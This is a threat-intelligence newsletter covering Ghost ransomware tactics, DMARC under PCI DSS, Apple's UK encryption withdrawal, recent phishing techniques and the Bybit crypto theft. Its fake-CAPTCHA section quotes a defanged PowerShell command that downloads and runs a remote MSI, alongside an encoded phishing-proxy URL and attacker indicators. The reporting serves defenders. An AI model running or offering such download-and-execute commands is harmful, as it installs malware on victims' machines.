Intelligence

Intelphreak - February 28, 2025

The Ghost/Cring Ransomware Gang's Unique Success; DMARC Required Under PCI DSS On March 31st of 2025; Apple Removes iCloud Encryption for UK; Recent High Efficacy Social Engineering Tactics; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange

ResidentGood, SirPicklJohn
· 23 min read
Send by email
Presented By ResidentGood & SirPicklJohn of Infophreak

Precedence: Routine

BLUF: The Ghost/Cring Ransomware Gang's Unique Success; DMARC Will Be Required Under PCI DSS 4.0.1 On March 31st of 2025; Apple Removes End-to-End iCloud Encryption for UK Users; Recent High Efficacy Social Engineering Tactics Include Reverse Proxy 2FA Bypass, Watering Hole Poisoning With Fake CAPTCHAs, Leveraging The Darcula 3.0 Phishing Kit, and Evolved Credential Phishing; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange via Supply-Chain Attack

BEGIN TEARLINE

[Adversary TTPs] New Insights on the Ghost Ransomware Gang and their Peculiar Success

On February 19th, 2025, the FBI, CISA, and MS-ISAC released a joint cybersecurity advisory on the Ghost (also known as Cring) ransomware gang (linked here). Ghost has victims in over 70 countries and specifically targets internet-facing systems with known, unpatched vulnerabilities (some of which are over a decade old!). This gang is also known as Cring, Cring Hand, RSA Virus, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.

That is a lot of names for one group, but this is not due to any errors or laziness in attribution - this group has an incredible suite of TTPs that make them incredibly stealthy and hard to follow. I extensively analyze this in the blog linked here, which contains new findings that even the FBI/CISA report missed! While reading all of the recent news reports on the gang, I had the burning question: What makes Ghost, in particular, so effective and successful, especially if they are only exploiting old, known vulnerabilities?

My investigation uncovered that all of the following factors, especially when working in tandem with each other, massively contribute to Ghost's success in both their profitability and their ability to give researchers and prosecutors a headache:

  • Threatening double-extortion, while not actually exfiltrating that much data
  • "Moving quickly" by taking mere hours or days to complete infiltration, privilege escalation and lateral movement, and final ransomware deployment
  • Tailoring attacks and demands to the victim
  • Demanding "reasonable" amounts of cryptocurrency equating to tens to hundreds of thousands of dollars, instead of millions like those of other high-profile gangs
  • Heavily utilizing Cobalt Strike, open-source tools, and native Windows/PowerShell tools and commands
  • Short, minimal, or no persistence
  • Lack of domain registration
  • Defense evasion, disablement, and impersonation, combined with LOTL
  • Anti-forensics and anti-system-recovery
  • Anti-debugging/anti-reverse engineering
  • Inconsistency and fluidity
  • Communication via encrypted email services and TOX (P2P, end-to-end encrypted messaging/video)
  • Specific targeting:
    • Public-facing applications and devices
    • Critical infrastructure, schools and universities, healthcare, government, religious institutions, technology and manufacturing, and SMBs
    • Avoiding hardened systems, and moving on when segmented networks are encountered that impede lateral movement
  • Imitating/being imitated by other ransomware groups

In combination with the above factors, this group augments its success with the inconsistent use of at least 7 different executable ransomware payloads, 9-26+ different encrypted file extensions, at least 9 different ransom notes, and at least 41 different email addresses used to contact them.

Analyst comments: (SirPicklJohn) Again, please check out this linked blog to see the following:

  • a full breakdown of how Ghost differentiates itself,
  • the investigation into all of the factors making Ghost uniquely successful,
  • recommendations on how to effectively defend against Ghost, and
  • lists of all the resources/indicators of compromise currently linked to Ghost.

[Compliance] PCI DSS 4.0.1 Mandates DMARC By 31st March 2025

DMARC will become a requirement for PCI DSS version 4.0.1 compliance on March 31st, 2025. DMARC is Domain-based Message Authentication, Reporting & Conformance (DMARC). In order to implement DMARC, an organization must first implement the following controls:

  • Sender Policy Framework (SPF): SPF is a way to authenticate emails by checking the mail server IP of the sender is authorized to send emails from a certain domain. DNS records must be adjusted to ensure the proper email servers are authorized for sending. This control can prevent email spoofing where an attacker tricks a user into thinking an email is sent from a trusted entity. A guide to creating SPF records can be found here.

  • DomainKeys Identified Mail (DKIM): DKIM provides a way for recipient mail servers to verify the sender and ensure the integrity of the email in transit via a digital signature. The sender creates a DKIM record signature that includes various email fields such as the sender email (from) or the email body. This record signature is then hashed and encrypted with a private key that only the sender can access before being added to the email. The receiver can then use a matching public key found in the DNS records to decrypt & verify that hash is the same as the one they generate of the email fields. This process verifies that the email is actually from the sender & its content were not manipulated in the process of transmission. A guide to setting up DKIM can be found here.

With both of these verification processes in place, DMARC allows an organization to control what happens when a message fails both DKIM & SPF verification. DMARC Policies include doing nothing, quarantining the message, or outright rejecting the message. With DMARC, an organization can gather and analyze data about messages that are failing verification. These metrics can be helpful in measuring malicious use of your domains.

Analyst Comments: (ResidentGood) This update is very beneficial as requirements yield more compliance than guidelines. Even if your organization is outside the scope of PCI DSS, DMARC can be a very useful tool for staying on top of domain security. Managed Service Providers with clients that handle card data must ensure compliance by implementing DMARC before the 31st of March, 2025. After that date it will be looked for during PCI DSS audits. A solid guide on setting up DMARC can be found here.

[Law] Apple Pulls Advanced Data Protection from UK Users

Apple confirmed on Friday, February 21st that they will be pulling their iCloud Advanced Data Protection (ADP) feature for users in the UK (current & new) in an exclusive statement to TechCrunch. A spokesperson for Apple, Fred Sainz, said they are gravely disappointed that they will not be able to offer this feature to their UK users. Advanced Data Protection is an optional feature that allows users to enable end-to-end encryption for most of their iCloud data including backups, photos and notes. This keeps data secure in transit from user devices and Apple iCloud servers. It also protects against the manipulation of data.

  • The UK government issued a Technical Capability Notice to Apple demanding it give them full access to encrypted user iCloud data (originally reported by the Washington Post). Apple will likely appeal this notice to a secret panel & a judge in the UK, however it is against the law to not comply with the notice during the appeals process, and to reveal the details of the secret notice.

  • This order was issued under the UK Investigatory Powers Act of 2016 which is quite controversial amongst privacy advocates across the globe. The purpose of this legislation is to enhance the capabilities of security agencies, intelligence agencies, law enforcement agencies, and public authorities to intercept and access communications. The law was designed with independent oversight & safeguards to protect the civil liberties of UK citizens. On February 6th & 7th of 2025, a representative of the UK Home Office said “We do not comment on operational matters, including for example confirming or denying the existence of any such notices…“ according to multiple media publications.

  • Data like health information, iMessages, FaceTime calls, and keychain credentials will still be protected by Apple encryption. Data that is not protected by end-to-end encryption will be both readable by Apple and entities that successfully obtain a subpoena for that information. Apple cannot automatically disable ADP for UK users that have it enabled, but they will require the user to disable it in order to keep using their iCloud account. This would aid in law enforcement efforts to collect evidence on suspects that use iCloud encryption.

  • The US Director of National Intelligence, Tulsi Gabbard, on February 25th wrote a letter to 2 US legislators stating the US is investigating whether this development will affect US Apple users and violate a bilateral agreement between the US & UK. The treaty in question is the CLOUD act which prevents both the US & the UK from demanding data on the citizens of the other country.

  • Apple has quite a history of legal conflicts with various government entities over protecting the privacy of their users. The most famous case being in 2016 when they won a case against a US government order to unlock the iPhone of a suspected terrorist. In a 2022 statement made to The Guardian, UK government officials came out against Apple introducing end-to-end encryption for cloud storage.

Analyst Comments: (ResidentGood) It is hard to find official information on this story as the order itself has not been released to the public. Privacy advocates are railing against this development as they claim it sets a precedent for more authoritarian governments to follow suit. While protecting victims is a high priority, building vulnerabilities in technology can lead to greater breaches of privacy & cyberattacks. Having more information about security controls that are not in place in certain jurisdictions makes it easier for attackers to target victims in those jurisdictions. Stories like this one are important to follow because they can set greater precedents for the cybersecurity industry as a whole.

[Adversary TTPs] The Latest High-Efficacy Tactics Used in Social Engineering Attacks

Social engineering and phishing attacks remain a constant concern in cybersecurity! The following four case studies represent some of the high-efficacy attack techniques that threat actors have been using in the wild recently:

"EvilProxy" Reverse Proxy Attacks

In this kind of attack, the session cookie/token of a user is stolen by the adversary using something called a "reverse proxy", which acts as an intermediary between the end-user and the cloud service (such as Microsoft 365). This bypasses the need for a user to input login credentials or utilize MFA tokens, as the user's session has already been authenticated with these.

Attack Chain Breakdown:

  1. Phishing email is sent to the victim (potentially from a compromised user that the victim trusts).
  2. The link in the email goes to a bogus intermediary site, such as the following:
    • Note the code of the malicious site, which contains an encoded link to the reverse proxy:
      • aHR0cHM6Ly8wLmluZHVzdHJpYWx0cnVja3Muc2l0ZS8/dXNlcm5hbWU9 (this is an example of obfuscation for defense evasion)
      • hXXps[:]//0[.]industrialtrucks[.]site/?username=
      • ^The code above takes the email that the user enters and then makes a request with it as a parameter to the industrialtrucks site, which is the actual reverse proxy that compromises the user.
  3. If the victim user is logged into the targeted cloud service in another tab, then that already-authenticated session is passed through the reverse proxy (compromising the session), to the legitimate cloud service.
  4. With access to the account, the attacker is able to then employ a variety of post-exploitation techniques:
    • As observed in this case, the attacker can add email forwarding rules (MITRE ATT&CK Technique T1114.003) to siphon emails (i.e., immediately removing them from the victim's inbox and into a more subtle folder the attacker monitors, so the victim never knows they received an email) from another person that the victim knows, in order to target that other person.
    • The initial phishing email, or new phishing emails, can be sent to other personnel.
    • Data in the account can begin to be exfiltrated.

Water-Hole Attack with Fake CAPTCHAs

In this attack, a legitimate website (or website plugin that legitimate sites use) is compromised and given malicious code that compromises end-users who browse the website (which is titularly analogous to "poisoning the watering hole"). One such implementation of this is in executing a fake CAPTCHA attack, where a fake CAPTCHA is displayed that copies a malicious PowerShell script to the user's clipboard, and instructs them to do a series of hotkeys/keyboard combinations to execute that code.

Attack Chain:

  1. User browses a legitimate website (which has subtly been compromised), and after about 30-60 seconds, a black overlay appears with a CAPTCHA: (note that the image has been heavily obfuscated/redacted to protect the identity of the victim)
  2. After clicking on the CAPTCHA, the user is walked through a series of steps to copy and paste the malicious PowerShell script:
    2. (Note that you can even see the "Successful" dialogue box pop up to indicate that the script was successfully copied to the user's keyboard.)
    3. The following script (with demilitarized links/extensions) is copied: cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw[.]msi'; Invoke-RestMethod -Uri 'https[:]//qq51f[.]short[.]gy/1' -OutFile $path; Start-Process $path;
  3. Malware is installed on the victim's computer, before doing all the nasty things that malware can do.

Further analysis of this specific attack (who's behind it?):

  • In this attack, qq51f[.]short[.]gy/1 (hosted on short.io, a URL shortening site) was requested, which in turn downloaded the malicious 01.brr file from the hosting site hXXps[:]//bestiamos[.]com/
  • Note that bestiamos, hosted by CloudFlare on 104[.]21[.]35[.172] (replicated on 172[.]67[.]178[.]15, likely for redundancy/backup purposes), hosts 694 other domains (source: whois.com). The name "Julia Smith" is likely bogus, and the address does not exist, but the registrant's email (gustavusabseits[@]gmail.com) has been used to register at least 225 other domains (source: whois.com):

Artifacts from the attack:

  • 3aw.msi
    • Author: Plash Amrita
    • Program name: WiX Toolset (4.0.0.0)
  • Requests to download 01.brr
  • Various folders:
    • fr_patch_test
    • Girlfriend
    • helpAdvanced_test
    • Womenfolk
  • Miscellaneous Malicious Files:
    • taskbg_v1_x64.lnk
    • sqsign.lnk
    • MSBuild.exe (in Microsoft.NET folder)
    • RoboTaskLite.exe
    • fell.jpg
    • residentiary.php
    • rtl280.bpl
    • vcl280.bpl
  • Requests to qq51f[.]short[.]gy or bestiamos[.]com
  • The following Solana crypto address: 5V12gWimv9jG6xBfnQ1txHc3vg5rvA3cjaSeYiVs3YXp (found on an illegitimate lookalike [gettrumpmeme[.]us] of the official TRUMP memecoin site [gettrumpmemes.com] - the attacker registered 6 lookalikes in total)
  • I did not take the time to run whois lookups on every single domain that was registered by gustavusabseits[@]gmail.com, but they may offer more insight into the source of this attack!

PhaaS and Site-Cloning by Darcula

Sophisticated phishing attacks are easier for novice attackers to execute than ever before! The threat actor "darcula" recently hit the news by announcing a major feature update to their Chinese and playfully cat-themed "darcula-suite" PhaaS (Phishing-as-a-Service) platform. Darcula was originally discovered in July 2023 by the researcher Oshri Kalfon (who has a brilliant writeup on what he found, that you can check out here: part 1, part 2), and the newly-released version (v3) of the platform has the following features for end users for both protection, ease-of-use, and robust fraud mechanisms:

  • User-Friendly, Enterprise-Grade Administrator Dashboard:

    • Developed with Docker, Node, React, SQLite, and 3rd-party NPM libraries. These all increase user-experience and accessibility.
    • Simplified campaign management
    • Performance dashboard
    • Real-time logs of stolen credentials, where victims are browsing, etc.
    • Automatic Telegram notifications after someone falls victim

  • Ability to Send RCS and iMessage Texts:

    • This bypasses SMS firewalls and employs end-to-end encryption (reducing the efficacy of filters and detection mechanisms)

  • Anti-Detection Features:

    • Randomized deployment paths to prevent hostname-level analysis
    • IP blocking
    • User-agent blocking to stop crawlers and scrapers
    • Device-type restrictions
    • Client-side page rendering with React, requiring a headless browser that prevents detection by some tools and providers
    • Tips from darcula, including hiding the origin server via CDN providers such as Cloudflare

  • Automated Credit Card Theft and Conversion Tools

    • Stolen credit card data can be turned into virtual card images for use in digital wallets/payment apps (like Apple Pay)
    • Note. Darcula-linked Telegram groups are already selling burner phones with pre-loaded stolen cards:

  • Custom phishing kit generator

    • This is one of the most consequential features, allowing users to clone any website with Puppeteer and modify elements like login fields, payment forms, 2FA prompts, etc. Pre-made templates are available.

      The Darcula-Suite, with the user editing elements of a cloned USPS site in preparation of an attack.

Note that Netcraft, a cybercrime disruption and takedown company that is one of the main researchers investigating darcula, has highlighted how prolific darcula phishing sites are. Using a worldwide proxy network and various tactics to bypass the darcula platform's defenses (read their report here), since 2024 Netcraft has...

  • detected 120 new domains hosting darcula phishing pages each day;
  • blocked about 96,600 Darcula 2.0 domains;
  • blocked about 20,200 phishing sites; and
  • blocked 30,900 IP addresses associated with darcula sites.

With version 3.0 of darcula-suite released, it is harder to detect and stop darcula attacks, the "average sophistication" of PhaaS and phishing campaigns is increasing, and sophisticated phishing attacks are even more accessible to anybody who wants to use them.

Classic Credential Phishing

These haven't gone away either! However, due to advances in security filtering and phishing detection, the sophistication of credential phishing pages has also evolved, with an attack chain looking like the following:

  1. A phishing email (e.g., a fake "Request For Information" response email) is sent to the end user, who clicks a link to an external file hosting site. Using this intermediary site helps phishing emails bypass security mechanisms because it does not actually contain any malicious code.
  2. The links in the external file hosting site, after being clicked, redirect the user to the actual phishing page that impersonates a service like Microsoft 365.

Note that this landing page, after getting past the CAPTCHA on the /BoDc/ page, was located at a different URL every time it was visited. Additionally, after compromising the user, the attacker was free to do any other post-exploitation activities:

  • Sending similar phishing emails to other users in the victim's address list (and then responding if they question the legitimacy of the email).
  • Stealing sensitive documents and data stored in the victim's account.
  • Registering their own MFA (if a previous MFA token or code was stolen) for persistence.
  • Employing MITRE ATT&CK Technique T1114.003 (Email Forwarding Rule).

Analyst Comments: (SirPicklJohn) Thanks for reading! Hopefully this gives you an inside view into the real-world attacks and techniques that are currently being used in the wild! Defenders can implement the following steps to effectively mitigate these attacks:

  • SETA: First and foremost, implement a robust security education, training, and awareness (SAT/SETA) program, with the leader of it being an articulate individual who understands its immense value. Sometimes, the only thing that prevents (or enables!) an attack is the human element!
  • Tips on MFA, from One Defender to Another: Rather than leaving you with the endlessly-repeated advice to "enable multifactor authentication on all cloud accounts", which you should do, I'd like to also say that there are still plenty of people who have never used multifactor authentication before and do not know what it is. You will likely receive pushback when mandating organization-wide multifactor authentication, but you need to stand firm, calmly articulate how important it is, and walk users through the process while troubleshooting their issues. Additionally, "phishing-resistant MFA" can prevent basic attacks like the credential phishing attack above by sending push notifications or displaying a window for a security key rather than just asking for a code - this is because a phishing site like blelinelipor will not be able to send a push notification to a user's phone or utilize the user's security key to compromise the account, while the site can still ask for and use a valid MFA code.
  • Conditional Access Policies: Conditional access policies are strong security controls that restrict or grant user access based on "if-then" statements. For example, "geofencing" users by restricting their logins to certain geographic areas, requiring all users to use a certain kind of MFA, allowing or denying logins from certain types of devices on certain types of networks and IP ranges, etc.

Thank you for reading - stay safe!

[Major Incident] Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange

On Friday, February 21, 2025, the popular Dubai-based cryptocurrency exchange Bybit lost $1.46 billion (in USD) in a cyberattack. The attackers stole this sum in the form of Ethereum and Staked Ether by creating malicious transactions to transfer the funds from a cold wallet (a crypto wallet where the private keys are stored offline) to a wallet address controlled by the threat actor. After exfiltration, the funds were laundered to prevent tracing.

According to Bybit, several third-parties collaborated in investigating & containing this situation including:

  • Forensic Analysis: Mandiant, Verichains, and Sygnia.co
  • Bad Actor Tracing & Identification: ZeroShadow
  • Tagging Exploited Addresses on Blockchains: Chainalysis, Elliptic, TRM, Goplus, SEAL911, and ZachXBT
  • Security Advisory: SlowMist, BlockSec, BEOSIN
  • Compliance & Risk Assessment: VerifyVASP, AML Bot, CryptoForensic
  • Cross-chain security Measures: Binance, Coinbase, Bitget, Polygon, Arbitrum, Optimism, Wormhole, Synapse, Connext, Chainflip, Across.to, Symbiosis.finance, AVAX, ChangeNow, fixedfloat, and cBridge

The contract with malicious transfer logic was located at 0x96221423681A6d52E184D440a8eFCEbB105C7242

The contract with malicious withdrawal abilities was located at 0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516

According to the preliminary investigation report from Verichains: “[t]he attacker successfully created a multi-signature transaction involving three signers, including the CEO of Bybit. This transaction upgraded Bybit’s multi-signature contract for Cold Wallet 1 (0x1Db92e2EbE8E0c075a02BeA49a2935BcD2dFCF4) on Safe.Global, pointing to a malicious contract (0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516) that was deployed three days earlier.” For emptying the wallets, the sweepETH & sweepERC20 backdoors were used.

List of Initial Threat Actor Addresses:

  • 0xdd90071d52f20e85c89802e5dc1ec0a7b6475f92
  • 0x0fa09c3a328792253f8dee7116848723b72a6d2e
  • 0xe8b36709dd86893bf7bb78a7f9746b826f0e8c84
  • 0x47666Fab8bd0Ac7003bce3f5C3585383F09486E2
  • 0xa4b2fd68593b6f34e51cb9edb66e71c1b4ab449e
  • 0x1542368a03ad1f03d96D51B414f4738961Cf4443
  • 0x36ed3c0213565530c35115d93a80f9c04d94e4cb

Sygnia’s investigation found direct injection of malicious JavaScript into a Safe{Wallet} Amazon S3 bucket. This code was designed to alter crypto transactions during signing. It was also designed to activate only for transactions involving Bybit’s main contract address and an unknown test address controlled by the attacker. After execution, the injected S3 resource was replaced with one that did not contain the malicious JavaScript, a technique to avoid detection. Since the attack came from Safe{Wallet}’s infrastructure, the investigation found that Bybit’s infrastructure had not been directly compromised.

During the incident response process, Bybit migrated its funds out of Safe{Wallet} addresses. Bybit created an API of continuously updated suspicious wallet addresses that have been blacklisted. They have also released a HackBounty website to get help from the industry in tracking down the hackers’ wallet. Successful interceptions will receive a 10% commission. As of February 24, Bybit claims to have replaced 100% of the stolen funds via loans, large deposits from abundant crypto owners, and purchases of Ethereum.

The FBI confirmed that this attack was carried out by a North Korean APT known as TraderTraitor which has ties to the Lazarus Group. This group is also tracked under the names APT38, BlueNoroff, and Stardust Chollima.

Safe{Wallet} confirmed in a public statement that the compromise of a developer machine led to this incident. They claimed that SAFE contracts were not affected by the incident. In response, Safe conducted an investigation, restored Safe{Wallet} to the main Ethereum chain in phases, reconfigured infrastructure and changed all credentials.

Analyst Comments: (ResidentGood) This is one of the largest cryptocurrency exfiltrations in recent history. The threat actor being tied to North Korea lines up with the trend of North Korean APTs using state-sponsored cyber attacks to finance military operations. This story highlights the importance of cryptocurrency organizations to secure themselves from supply-chain attacks. Your security controls are not as effective if another organization that is integrated into your tech stack is compromised.

END REPORT

If you are interested in anything Cybersecurity, come check out our Discord

Sources:

The Latest High-Efficacy Social Engineering Attack Tactics

PCI DSS 4.0.1 Mandates DMARC By 31st March 2025

Apple Pulls Advanced Data Protection from UK Users

New Insights on Ghost's Unique Success

Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange

SirPicklJohn

Written by ResidentGood

Cyber Threat Intelligence, Digital Forensics, OSINT

Keep reading